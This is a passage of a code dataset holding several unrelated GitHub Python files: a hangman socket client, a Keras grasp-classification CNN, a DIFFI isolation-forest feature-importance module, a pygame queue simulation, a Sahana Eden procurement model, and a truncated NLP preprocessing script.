Guess a letter.\")\n display_message(stdscr, 1, \"Input letter: \")\n\n\ndef process_response(stdscr, attempts, response):\n if \"Invalid\" in response:\n display_message(stdscr, 3, response)\n elif \"Wrong\" in response:\n attempts += 1\n draw_stick_man(stdscr, attempts)\n display_message(stdscr, 3, response)\n elif \"lose\" in response or \"win\" in response:\n display_exit_message(stdscr, response)\n attempts = -1\n else:\n display_message(stdscr, 2, response)\n return attempts\n\n\ndef display_exit_message(stdscr, response):\n stdscr.move(0, 0)\n stdscr.clrtobot()\n display_message(stdscr, 0, response)\n display_message(stdscr, 1, \"Press any key to exit.\")\n stdscr.refresh()\n stdscr.getch()\n\ndef get_input_letter(stdscr):\n stdscr.move(1, 14)\n guess = chr(stdscr.getch()).lower()\n stdscr.addch(guess)\n stdscr.refresh()\n return guess\n\ndef main(stdscr):\n signal.signal(signal.SIGINT, signal_handler)\n\n client_socket.connect((host, port))\n\n stdscr.clear()\n display_welcome(stdscr)\n stdscr.refresh()\n\n attempts = 0\n while attempts != -1:\n guess = get_input_letter(stdscr)\n\n client_socket.send(guess.encode())\n\n response = client_socket.recv(1024).decode()\n attempts = process_response(stdscr, attempts, response)\n\n client_socket.close()\n\n\nif __name__ == \"__main__\":\n wrapper(main)\n","repo_name":"angelsz1/Programacion_Concurrente-TP","sub_path":"TP1/Integrador/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19640331834","text":"import os, glob, numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nimport matplotlib.pyplot as plt\r\nimport keras.backend.tensorflow_backend as K\r\nimport tensorflow as tf\r\nfrom tensorflow.python.client import device_lib\r\nfrom keras import optimizers\r\n\r\n#GPU CPU 연산 \r\nconfig = tf.compat.v1.ConfigProto() \r\nconfig.gpu_options.allow_growth = True #allow_growth 옵션: 초기에 메모리를 할당하지 않고 세션을 시작한 후에 더 많은 GPU 메모리가\r\n#필요할때 메모리 영역을 확장한다.\r\n# ex) config.gpu_options.per_process_gpu_memory_fraction = 0.6: 전체 GPU소모량을 정하고 싶을때\r\nsession = tf.compat.v1.Session(config=config) #세션 셜정\r\n\r\nresult = []\r\n\r\nfolder = [\"All\"]\r\n# folder = [\"Finger\", \"Hand\", \"Angle\", \"Effort\", \"All\"]\r\nnormalization = [\"Normalization\"]\r\n# normalization = [\"Standard\", \"Minmax\", \"Robust\", \"Normalization\"]\r\n\r\ndefalut = \"D:/Classification/Barrett_Hand_codes\"\r\n\r\nfor f, number in enumerate(range(len(folder))): \r\n for i, title in enumerate(range(len(normalization))):\r\n X_train, X_test, y_train, y_test = np.load(defalut + '/dataset/dataset_%s_%s.npy'%(folder[number], normalization[title])) #데이터 셋 로딩\r\n\r\n categories = [\"ball\", \"banana\", \"can\",\"cube\",\"pear\",\"spam\",\"strawberry\",\"tennis\"]\r\n nb_classes = len(categories)\r\n \r\n X_train = X_train.astype(float) / 255 #X 데이터는 흑백으로 구성되어 있음. 
0~255의 값을 0~1의 값으로 Nomalize\r\n X_test = X_test.astype(float) / 255\r\n \r\n #print(device_lib.list_local_devices())\r\n \r\n with K.tf_ops.device('/device:CPU:0'):\r\n model = Sequential() #선형 모델\r\n model.add(Conv2D(32, (3,3), padding=\"same\", input_shape=X_train.shape[1:], activation='relu'))\r\n #conv2D(컨볼루션 필터 수, 컨볼루션 커널의 수, 입력형태(샘플 수 제외), 활성화 함수)\r\n # model.add(MaxPooling2D(pool_size=(2,2))) # 차원에 대한 Downsampling 수행\r\n model.add(Dropout(0.2)) #Overfitting 을 방지하기 위한 Dropout\r\n \r\n model.add(Conv2D(64, (3,3), padding=\"same\", activation='relu'))\r\n model.add(MaxPooling2D(pool_size=(2,2)))\r\n model.add(Dropout(0.2))\r\n \r\n # model.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\r\n model.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\r\n model.add(MaxPooling2D(pool_size=(2,2)))\r\n model.add(Dropout(0.2))\r\n \r\n # model.add(Conv2D(256, (3,3), padding=\"same\", activation='relu'))\r\n # model.add(MaxPooling2D(pool_size=(2,2)))\r\n # model.add(Dropout(0.4))\r\n \r\n model.add(Flatten()) \r\n \r\n model.add(Dense(256, activation='relu')) #은닉 계층\r\n model.add(Dropout(0.4))\r\n model.add(Dense(nb_classes, activation='softmax')) \r\n \r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n \r\n model_path = defalut + '/models/model_%s_%s.model'%(folder[number], normalization[title])\r\n checkpoint = ModelCheckpoint(filepath=model_path , monitor='val_loss', verbose=1, save_best_only=True)\r\n #verbose : 해당 함수의 진행 사항의 출력 여부\r\n #save_best_only : 모델의 정확도가 최고값을 갱신했을때만 저장\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=10)\r\n #최고 성능의 모델이 찾아졌을 경우 학습 중단. ex: epochs = 100 pa tience = 10, 100번 학습할동안 6번 이내로 찾아내지 못하면 중단\r\n \r\n model.summary()\r\n \r\n #모델 학습시키기\r\n history = model.fit(X_train, y_train, batch_size=64, epochs=10, \r\n #validation_data=(X_test, y_test), callbacks=[checkpoint])\r\n validation_data=(X_test, y_test), callbacks=[checkpoint, early_stopping])\r\n \r\n result.append(folder[number] + \"_\" + normalization[title] + \" : \" + \"%.4f\"% (model.evaluate(X_test, y_test)[1]))\r\n #print(\"정확도 : %.4f\" % (model.evaluate(X_test, y_test)[1]))#모델 평가하기\r\n \r\n acc = history.history['accuracy']\r\n val_acc = history.history['val_accuracy']\r\n loss = history.history['loss']\r\n val_loss = history.history['val_loss']\r\n \r\n epochs = range(1, len(acc) + 1)\r\n \r\n plt.plot(epochs, loss, 'b', label = 'Training loss')\r\n plt.plot(epochs, val_loss, 'r', label = 'Validation loss')\r\n \r\n plt.plot(epochs, acc, 'y', label = 'T Acc')\r\n plt.plot(epochs, val_acc, 'g', label = 'V acc')\r\n \r\n plt.title(folder[number] + \"_\" + normalization[title] + \" : \" + \"%.4f\"% (model.evaluate(X_test, y_test)[1]))\r\n plt.legend(loc = 'best')\r\n plt.figure(figsize=(16,10))\r\n plt.show()\r\n \r\nfor pp in range(0, 4):\r\n print(result[pp])","repo_name":"LEEYUN-JU/Hand-data-model-","sub_path":"Hand_data_model/Barrett_Hand_model_make.py","file_name":"Barrett_Hand_model_make.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11545535485","text":"import numpy as np\nfrom sklearn.ensemble._iforest import _average_path_length\n\n# epsilon as defined in the original paper\n_EPSILON = 1e-2\n\ndef diffi_score(forest, X, inlier_samples=\"auto\"):\n \"\"\"\n Depth-based Isolation Forest Feature Importance (DIFFI) Algorithm [1].\n\n Return the feature importance for every feature of a given isolation forest.\n\n 
Parameters\n ----------\n X : numpy.ndarray of shape (n_samples, n_features)\n The input samples.\n\n inlier_samples : 'auto', 'all' or int, default='auto'\n The amount of inlier samples to consider when computing importance coefficient.\n - If 'auto', use the same amount of outliers found.\n - If 'all', use the all the inliers in the dataset.\n - If int, the contamination should be in the range [0, 0.5].\n\n Returns\n -------\n fi : numpy.ndarray of shape (n_features,)\n Array with the inportance of each feature.\n\n References\n ----------\n .. [1] Carletti, Mattia, Chiara Masiero, Alessandro Beghi, and Gian Antonio Susto.\n \"Explainable machine learning in industry 4.0: evaluating feature importance in anomaly detection to enable root cause analysis.\"\n IEEE International Conference on Systems, Man and Cybernetics (SMC), pp. 21-26. IEEE, 2019.\n \"\"\"\n\n pred = forest.predict(X)\n X_out = X[pred < 0]\n X_in = X[pred > 0]\n\n if inlier_samples == \"all\":\n k = X_in.shape[0]\n elif inlier_samples == \"auto\":\n k = X_out.shape[0]\n else:\n k = int(inlier_samples)\n if k < X_in.shape[0]:\n X_in = X_in[np.random.choice(X_in.shape[0], k, replace=False), :]\n\n return (_mean_cumulative_importance(forest, X_out) /\n _mean_cumulative_importance(forest, X_in))\n\n\ndef _mean_cumulative_importance(forest, X):\n '''\n Computes mean cumulative importance for every feature of given forest on dataset X\n '''\n\n f_importance = np.zeros(X.shape[1])\n f_count = np.zeros(X.shape[1])\n\n if forest._max_features == X.shape[1]:\n subsample_features = False\n else:\n subsample_features = True\n\n for tree, features in zip(forest.estimators_, forest.estimators_features_):\n X_subset = X[:, features] if subsample_features else X\n\n importance_t, count_t = _cumulative_ic(tree, X_subset)\n\n if subsample_features:\n f_importance[features] += importance_t\n f_count[features] += count_t\n else:\n f_importance += importance_t\n f_count += count_t\n\n return f_importance / f_count\n\n\ndef _cumulative_ic(tree, X):\n '''\n Computes importance and count for every feature of given tree on dataset X\n '''\n importance = np.zeros(X.shape[1])\n count = np.zeros(X.shape[1])\n\n node_indicator = tree.decision_path(X)\n node_loads = np.array(node_indicator.sum(axis=0)).reshape(-1)\n # depth is number of edges in path, same as number of nodes in path -1\n depth = np.array(node_indicator.sum(axis=1), dtype=float).reshape(-1) - 1\n # when the tree is pruned (i.e. 
more than one instance at the leaf)\n # we consider the average path length to adjust depth\n leaves_index = tree.apply(X)\n depth += _average_path_length(node_loads[leaves_index])\n\n iic = _induced_imbalance_coeff(tree, X, node_loads)\n rows, cols = node_indicator.nonzero()\n for i, j in zip(rows, cols):\n f = tree.tree_.feature[j]\n # ignore leaf nodes\n if f < 0:\n continue\n count[f] += 1\n importance[f] += iic[j] / depth[i]\n\n return importance, count\n\ndef _induced_imbalance_coeff(tree, X, node_loads):\n '''\n Computes imbalance coefficient for every *node* of a tree on dataset X\n '''\n iic = np.zeros_like(node_loads)\n for i in range(len(iic)):\n # ignore leaf nodes\n if tree.tree_.children_left[i] < 0:\n continue\n n_left = node_loads[tree.tree_.children_left[i]]\n n_right = node_loads[tree.tree_.children_right[i]]\n if n_left == 0 or n_right == 0:\n iic[i] = _EPSILON\n continue\n if n_left == 1 or n_right == 1:\n iic[i] = 1\n continue\n iic[i] = max(n_left, n_right) / node_loads[i]\n return iic\n","repo_name":"britojr/diffi","sub_path":"diffi/diffi.py","file_name":"diffi.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"35894508879","text":"import pygame\nfrom pygame.locals import *\nfrom actor import Actor, Neighbourhood, Shop\nfrom app0 import *\nfrom random import randint\nimport helper\nfrom math import sin, cos, pi, radians\n\npygame.init()\nscreen = pygame.display.set_mode([1400,800])\nclock = pygame.time.Clock()\n\ntick = 0\nhour = 0\n\nrunning = True\n\n\n\ndef graph(screen,x,y,xScale,yScale,data,limit):\n\n cols = [(255,0,0),(0,255,0),(0,0,255),(255,0,255)]\n\n if len(data[0])==0:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*20)))\n elif max(data[0])<20:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*20)))\n else:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*max(data[0]))))\n\n pygame.draw.line(screen,(255,255,255),(x,y),(x+(24*6*xScale),y))\n\n pygame.draw.line(screen,(255,0,0),(x,y-(yScale*limit)),(x+(24*6*xScale),y-(yScale*limit)))\n\n for j in range(0,len(data)):\n for i in range(0,len(data[j])-1):\n point =data[j][i]\n nextPoint = data[j][i+1]\n col = (0,255,0)\n pygame.draw.line(screen,cols[j],(x+int(i*xScale),y-int(point*yScale)),(x+int((i+1)*xScale),y-int(nextPoint*yScale)),1)\n\n\nactors,hood = helper.setup(64)\n\nwhile running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n screen.fill((0,0,0))\n\n\n #Update all actor states every 10 ticks\n if tick%10==0:\n print(\"\\t\",str(int(hour))+\":\"+str(int(hour%1 * 60))+\"\\t\"+str(tick))\n for i in actors:\n i.run(hour,hood,[blind,block])\n \n for shop in hood.shops:\n shop.run(hour,tick)\n\n #Draw all actors\n for i in actors:\n i.draw(screen,tick%10)\n for i in hood.shops:\n i.draw(screen)\n\n #Draw graph\n alldata = []\n for i in hood.shops: alldata.append(i.historicQueue)\n\n xScale = 5/3.\n yScale = 5\n graph(screen,800,800,xScale,yScale,alldata,hood.shops[0].throughput)\n\n #Draw clock\n centre = [750,100]\n pygame.draw.circle(screen,(255,255,255),centre,40,2)\n theta = radians(tick/2)\n #hour hand\n length = 20\n endX = centre[0] + (length * sin(theta))\n endY = centre[1] - (length * cos(theta))\n pygame.draw.line(screen,(255,255,255),centre,[endX,endY],3)\n #minute hand\n phi = radians(tick*6)\n length2 = 30\n endX = centre[0] + (length2 * sin(phi))\n endY = centre[1] - (length2 * cos(phi))\n 
pygame.draw.line(screen,(255,255,255),centre,[endX,endY],1)\n\n \"\"\"\n for i in range(0,2):\n xScale = 5/3.\n yScale = 5\n graph(screen,1100,200+(25*yScale + 100)*i,xScale,yScale,hood.shops[i+2].historicQueue,hood.shops[i+2].throughput)\n\"\"\"\n\n pygame.display.update()\n clock.tick(30)\n tick += 1\n hour = (tick/60)%24\n","repo_name":"smross106/covid-queue-simulation","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74809439891","text":"__all__ = (\"ProcurementPlansModel\",\n \"PurchaseOrdersModel\",\n \"proc_rheader\"\n )\n\nfrom gluon import *\nfrom gluon.storage import Storage\nfrom ..s3 import *\n#from .supply import SupplyItemPackQuantity\n\n# =============================================================================\nclass ProcurementPlansModel(S3Model):\n \"\"\"\n Procurement Plans\n\n @ToDo: Link Table to Projects\n \"\"\"\n\n names = (\"proc_plan\",\n \"proc_plan_item\"\n )\n\n def model(self):\n\n T = current.T\n db = current.db\n auth = current.auth\n\n crud_strings = current.response.s3.crud_strings\n define_table = self.define_table\n #messages = current.messages\n configure = self.configure\n settings = current.deployment_settings\n\n SITE_LABEL = settings.get_org_site_label()\n\n # =====================================================================\n # Planned Procurements\n #\n proc_shipping_opts = {0: NONE,\n 1: T(\"Air\"),\n 2: T(\"Rail\"),\n 3: T(\"Road\"),\n 4: T(\"Sea\")\n }\n\n tablename = \"proc_plan\"\n define_table(tablename,\n self.super_link(\"site_id\", \"org_site\",\n label = SITE_LABEL,\n default = auth.user.site_id if auth.is_logged_in() else None,\n readable = True,\n writable = True,\n empty = False,\n # Comment these to use a Dropdown & not an Autocomplete\n #widget = S3SiteAutocompleteWidget(),\n #comment = DIV(_class=\"tooltip\",\n # _title=\"%s|%s\" % (T(\"Inventory\"),\n # messages.AUTOCOMPLETE_HELP)),\n represent = self.org_site_represent,\n ),\n s3_date(\"order_date\",\n label = T(\"Order Date\")\n ),\n s3_date(\"eta\",\n label = T(\"Date Expected\"),\n ),\n # @ToDo: Do we want more than 1 supplier per Plan?\n # @ToDo: Filter to orgs of type 'supplier'\n self.org_organisation_id(label = T(\"Supplier\")),\n Field(\"shipping\", \"integer\",\n requires = IS_EMPTY_OR(IS_IN_SET(proc_shipping_opts)),\n represent = s3_options_represent(proc_shipping_opts),\n label = T(\"Shipping Method\"),\n default = 0,\n ),\n # @ToDo: Add estimated shipping costs\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Create Procurement Plan\"),\n title_display = T(\"Procurement Plan Details\"),\n title_list = T(\"Procurement Plans\"),\n title_update = T(\"Edit Procurement Plan\"),\n label_list_button = T(\"List Procurement Plans\"),\n label_delete_button = T(\"Delete Procurement Plan\"),\n msg_record_created = T(\"Procurement Plan added\"),\n msg_record_modified = T(\"Procurement Plan updated\"),\n msg_record_deleted = T(\"Procurement Plan deleted\"),\n msg_list_empty = T(\"No Procurement Plans currently registered\"))\n\n # ---------------------------------------------------------------------\n # Redirect to the Items tabs after creation\n plan_item_url = URL(f=\"plan\", args=[\"[id]\", \"plan_item\"])\n configure(tablename,\n # @ToDo: Move these to controller r.interactive?\n create_next = plan_item_url,\n update_next = plan_item_url,\n )\n\n 
proc_plan_represent = self.proc_plan_represent\n plan_id = S3ReusableField(\"plan_id\", \"reference %s\" % tablename,\n sortby = \"date\",\n requires = IS_EMPTY_OR(\n IS_ONE_OF(db, \"proc_plan.id\",\n proc_plan_represent,\n orderby=\"proc_plan.date\",\n sort=True)),\n represent = proc_plan_represent,\n label = T(\"Procurement Plan\"),\n ondelete = \"CASCADE\",\n )\n\n # Items as a component of Plans\n self.add_components(tablename,\n proc_plan_item = \"plan_id\",\n )\n\n # =====================================================================\n # Procurement Plan Items\n #\n tablename = \"proc_plan_item\"\n define_table(tablename,\n plan_id(),\n self.supply_item_entity_id(),\n self.supply_item_id(),\n self.supply_item_pack_id(),\n Field(\"quantity\", \"double\", notnull = True,\n label = T(\"Quantity\"),\n ),\n # @ToDo: Move this into a Currency Widget\n # for the pack_value field\n s3_currency(readable=False,\n writable=False\n ),\n Field(\"pack_value\", \"double\",\n label = T(\"Value per Pack\"),\n readable = False,\n writable = False,\n ),\n #Field(\"pack_quantity\",\n # \"double\",\n # compute = record_pack_quantity), # defined in supply\n #Field.Method(\"pack_quantity\",\n # SupplyItemPackQuantity(tablename)),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Add Item to Procurement Plan\"),\n title_display = T(\"Procurement Plan Item Details\"),\n title_list = T(\"Items in Procurement Plan\"),\n title_update = T(\"Edit Procurement Plan Item\"),\n label_list_button = T(\"List Items in Procurement Plan\"),\n label_delete_button = T(\"Remove Item from Procurement Plan\"),\n msg_record_created = T(\"Item added to Procurement Plan\"),\n msg_record_modified = T(\"Procurement Plan Item updated\"),\n msg_record_deleted = T(\"Item removed from Procurement Plan\"),\n msg_list_empty = T(\"No Items currently registered in this Procurement Plan\"))\n\n # ---------------------------------------------------------------------\n # Item Search Method\n #\n filter_widgets = [\n S3TextFilter([\"item_id$name\",\n #\"item_id$category_id$name\",\n #\"plan_id$site_id$name\"\n ],\n label = T(\"Search\"),\n comment = T(\"Search for an item by text.\"),\n ),\n S3OptionsFilter(\"plan_id$organisation_id$name\",\n label = T(\"Supplier\"),\n comment = T(\"If none are selected, then all are searched.\"),\n cols = 2,\n hidden = True,\n ),\n #S3OptionsFilter(\"plan_id$site_id\",\n # label = T(\"Facility\"),\n # represent = \"%(name)s\",\n # comment = T(\"If none are selected, then all are searched.\"),\n # cols = 2,\n # hidden = True,\n # ),\n #S3DateFilter(\"plan_id$order_date\",\n # label=T(\"Order Date\"),\n # hidden = True,\n # ),\n #S3DateFilter(\"plan_id$eta\",\n # label = T(\"Date Expected\"),\n # hidden = True,\n # ),\n ]\n\n configure(tablename,\n super_entity = \"supply_item_entity\",\n filter_widgets = filter_widgets,\n #report_groupby = db.proc_plan.site_id,\n report_hide_comments = True,\n )\n\n # ---------------------------------------------------------------------\n # Pass names back to global scope (s3.*)\n #\n return None\n\n # -------------------------------------------------------------------------\n @staticmethod\n def proc_plan_represent(plan_id, row=None):\n \"\"\"\n Represent a Procurement Plan\n \"\"\"\n\n if row:\n table = current.db.proc_plan\n elif not plan_id:\n return NONE\n else:\n db = current.db\n table = db.proc_plan\n row = db(table.id == plan_id).select(table.site_id,\n table.order_date,\n limitby = (0, 1),\n 
).first()\n try:\n return \"%s (%s)\" % (table.site_id.represent(row.site_id),\n table.order_date.represent(row.order_date))\n except AttributeError:\n # Plan not found\n return current.messages.UNKNOWN_OPT\n\n# =============================================================================\nclass PurchaseOrdersModel(S3Model):\n \"\"\"\n Purchase Orders (PO)\n\n @ToDo: Link to inv_send\n @ToDo: Link to inv_req\n \"\"\"\n\n names = (\"proc_order\",\n \"proc_order_item\"\n \"proc_order_tag\"\n )\n\n def model(self):\n\n T = current.T\n db = current.db\n auth = current.auth\n\n crud_strings = current.response.s3.crud_strings\n define_table = self.define_table\n #messages = current.messages\n configure = self.configure\n settings = current.deployment_settings\n\n SITE_LABEL = settings.get_org_site_label()\n string_represent = lambda s: s if s else NONE\n purchase_ref = S3ReusableField(\"purchase_ref\",\n label = T(\"%(PO)s Number\") % \\\n {\"PO\": settings.get_proc_shortname()},\n represent = string_represent,\n )\n\n # =====================================================================\n # Purchase Orders\n #\n\n tablename = \"proc_order\"\n define_table(tablename,\n purchase_ref(),\n self.super_link(\"site_id\", \"org_site\",\n label = SITE_LABEL,\n default = auth.user.site_id if auth.is_logged_in() else None,\n readable = True,\n writable = True,\n #empty = False,\n # Comment these to use a Dropdown & not an Autocomplete\n #widget = S3SiteAutocompleteWidget(),\n #comment = DIV(_class=\"tooltip\",\n # _title=\"%s|%s\" % (T(\"Inventory\"),\n # messages.AUTOCOMPLETE_HELP)),\n represent = self.org_site_represent,\n ),\n s3_date(default = \"now\"),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Create Purchase Order\"),\n title_display = T(\"Purchase Order Details\"),\n title_list = T(\"Purchase Orders\"),\n title_update = T(\"Edit Purchase Order\"),\n label_list_button = T(\"List Purchase Orders\"),\n label_delete_button = T(\"Delete Purchase Order\"),\n msg_record_created = T(\"Purchase Order added\"),\n msg_record_modified = T(\"Purchase Order updated\"),\n msg_record_deleted = T(\"Purchase Order deleted\"),\n msg_list_empty = T(\"No Purchase Orders currently registered\"))\n\n # ---------------------------------------------------------------------\n # Redirect to the Items tabs after creation\n order_item_url = URL(f=\"order\", args=[\"[id]\", \"order_item\"])\n configure(tablename,\n create_onaccept = self.proc_order_onaccept,\n # @ToDo: Move these to controller r.interactive?\n create_next = order_item_url,\n update_next = order_item_url,\n )\n\n proc_order_represent = S3Represent(lookup = tablename,\n fields = [\"purchase_ref\"],\n )\n order_id = S3ReusableField(\"order_id\", \"reference %s\" % tablename,\n sortby = \"date\",\n requires = IS_EMPTY_OR(\n IS_ONE_OF(db, \"proc_order.id\",\n proc_order_represent,\n orderby=\"proc_order.date\",\n sort=True)),\n represent = proc_order_represent,\n label = T(\"Purchase Order\"),\n ondelete = \"CASCADE\",\n )\n\n # Items as a component of Plans\n self.add_components(tablename,\n proc_order_item = \"order_id\",\n proc_order_tag = {\"name\": \"tag\",\n \"joinby\": \"order_id\",\n },\n )\n\n # =====================================================================\n # Purchase Order Items\n #\n tablename = \"proc_order_item\"\n define_table(tablename,\n order_id(),\n self.supply_item_entity_id(),\n self.supply_item_id(),\n self.supply_item_pack_id(),\n Field(\"quantity\", \"double\", 
notnull = True,\n label = T(\"Quantity\"),\n ),\n # @ToDo: Move this into a Currency Widget\n # for the pack_value field\n s3_currency(readable=False,\n writable=False\n ),\n Field(\"pack_value\", \"double\",\n label = T(\"Value per Pack\"),\n readable = False,\n writable = False,\n ),\n #Field.Method(\"pack_quantity\",\n # SupplyItemPackQuantity(tablename)),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Add Item to Purchase Order\"),\n title_display = T(\"Purchase Order Item Details\"),\n title_list = T(\"Items in Purchase Order\"),\n title_update = T(\"Edit Purchase Order Item\"),\n label_list_button = T(\"List Items in Purchase Order\"),\n label_delete_button = T(\"Remove Item from Purchase Order\"),\n msg_record_created = T(\"Item added to Purchase Order\"),\n msg_record_modified = T(\"Purchase Order Item updated\"),\n msg_record_deleted = T(\"Item removed from Purchase Order\"),\n msg_list_empty = T(\"No Items currently registered in this Purchase Order\"))\n\n # ---------------------------------------------------------------------\n # Item Search Method\n #\n filter_widgets = [\n S3TextFilter([\"item_id$name\",\n #\"item_id$category_id$name\",\n #\"order_id$site_id$name\"\n ],\n label = T(\"Search\"),\n comment = T(\"Search for an item by text.\"),\n ),\n S3OptionsFilter(\"order_id$organisation_id$name\",\n label = T(\"Supplier\"),\n comment = T(\"If none are selected, then all are searched.\"),\n cols = 2,\n hidden = True,\n ),\n #S3OptionsFilter(\"order_id$site_id\",\n # label = T(\"Facility\"),\n # represent =\"%(name)s\",\n # comment = T(\"If none are selected, then all are searched.\"),\n # cols = 2,\n # hidden = True,\n # ),\n #S3DateFilter(\"order_id$order_date\",\n # label = T(\"Order Date\"),\n # hidden = True,\n # ),\n ]\n\n configure(tablename,\n super_entity = \"supply_item_entity\",\n filter_widgets = filter_widgets,\n #report_groupby = db.proc_order.site_id,\n report_hide_comments = True,\n )\n\n # ---------------------------------------------------------------------\n # Purchase Order Tags\n # - Key-Value extensions\n # - can be used to provide conversions to external systems\n # - can be a Triple Store for Semantic Web support\n #\n tablename = \"proc_order_tag\"\n define_table(tablename,\n order_id(),\n # key is a reserved word in MySQL\n Field(\"tag\",\n label = T(\"Key\"),\n ),\n Field(\"value\",\n label = T(\"Value\"),\n ),\n s3_comments(),\n *s3_meta_fields())\n\n configure(tablename,\n deduplicate = S3Duplicate(primary = (\"order_id\",\n \"tag\",\n ),\n ),\n )\n\n # ---------------------------------------------------------------------\n # Pass names back to global scope (s3.*)\n #\n return {\"proc_order_id\": order_id,\n }\n\n # -------------------------------------------------------------------------\n def defaults(self):\n \"\"\"\n Safe defaults for model-global names in case module is disabled\n \"\"\"\n\n return {\"proc_order_id\": S3ReusableField.dummy(\"order_id\"),\n }\n\n # -------------------------------------------------------------------------\n @staticmethod\n def proc_order_onaccept(form):\n \"\"\"\n When a proc_order record is created then create the purchase_ref.\n \"\"\"\n\n db = current.db\n table = db.proc_order\n # If the purchase_ref is None then set it up\n record_id = form.vars.id\n record = table[record_id]\n if not record.purchase_ref:\n # PO Number\n code = current.s3db.supply_get_shipping_code(\n current.deployment_settings.get_proc_shortname(),\n record.site_id,\n 
table.purchase_ref,\n )\n db(table.id == record_id).update(purchase_ref = code)\n\n# =============================================================================\ndef proc_rheader(r):\n \"\"\" Resource Header for Procurements \"\"\"\n\n rheader = None\n\n if r.representation == \"html\":\n record = r.record\n if record:\n tablename = r.tablename\n if tablename == \"proc_order\":\n T = current.T\n\n tabs = [(T(\"Edit Details\"), None),\n (T(\"Items\"), \"order_item\"),\n ]\n rheader_tabs = s3_rheader_tabs(r, tabs)\n\n table = r.table\n\n rheader = DIV(TABLE(TR(TH(\"%s: \" % table.purchase_ref.label),\n record.purchase_ref,\n ),\n TR(TH(\"%s: \" % table.site_id.label),\n table.site_id.represent(record.site_id),\n ),\n TR(TH(\"%s: \" % table.date.label),\n table.date.represent(record.date),\n ),\n ),\n rheader_tabs\n )\n\n elif tablename == \"proc_plan\":\n T = current.T\n\n tabs = [(T(\"Edit Details\"), None),\n (T(\"Items\"), \"plan_item\"),\n ]\n rheader_tabs = s3_rheader_tabs(r, tabs)\n\n table = r.table\n\n rheader = DIV(TABLE(TR(TH(\"%s: \" % table.site_id.label),\n table.site_id.represent(record.site_id),\n ),\n TR(TH(\"%s: \" % table.order_date.label),\n table.order_date.represent(record.order_date),\n ),\n TR(TH(\"%s: \" % table.eta.label),\n table.eta.represent(record.eta),\n ),\n TR(TH(\"%s: \" % table.shipping.label),\n table.shipping.represent(record.shipping),\n ),\n ),\n rheader_tabs\n )\n return rheader\n\n# END =========================================================================\n","repo_name":"sahana/eden","sub_path":"modules/s3db/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":376,"dataset":"github-code","pt":"66"} +{"seq_id":"1292740430","text":"import json\n\nwith open('148.json') as jsonfile:\n art = json.load(jsonfile)\n print(art['dimension'])\n\nprint()\n\nme = {'first_name': 'Kenneth', 'last_name': 'Love', 'topic': 'Python'}\nhim = {'first_name': 'Craig', 'last_name': 'Dennis', 'topic': 'Java'}\n# print(str(me))\n# print(json.dumps(me))\n\n# with open('teachers.json', 'a') as teacher_file:\n# json.dump([me, him], teacher_file)\n\nwith open('teachers.json') as teachers_file:\n teachers = json.load(teachers_file)\n print(teachers)\n","repo_name":"raulgiron/TTH-Python","sub_path":"art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19860059095","text":"import pandas as pd\nimport numpy as np\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nimport os\n\ndef preprocessOverview(text):\n # tokenize text and set to lower case\n tokens = [x.strip().lower() for x in nltk.word_tokenize(text)]\n\n # get stopwords from nltk, remove them from our list as well as all punctuations and numbers\n stop_words = stopwords.words('english')\n output = [word for word in tokens if (word not in stop_words and word.isalpha())]\n\n return \" \".join(output)\n\n\ndef sentences_to_indices(X, word_to_index, max_len):\n\n # number of training examples\n m = X.shape[0]\n\n # Initialize X_indices as a numpy matrix of zeros and the correct shape (~ 1 line)\n X_indices = np.zeros((m, max_len))\n\n # loop over 
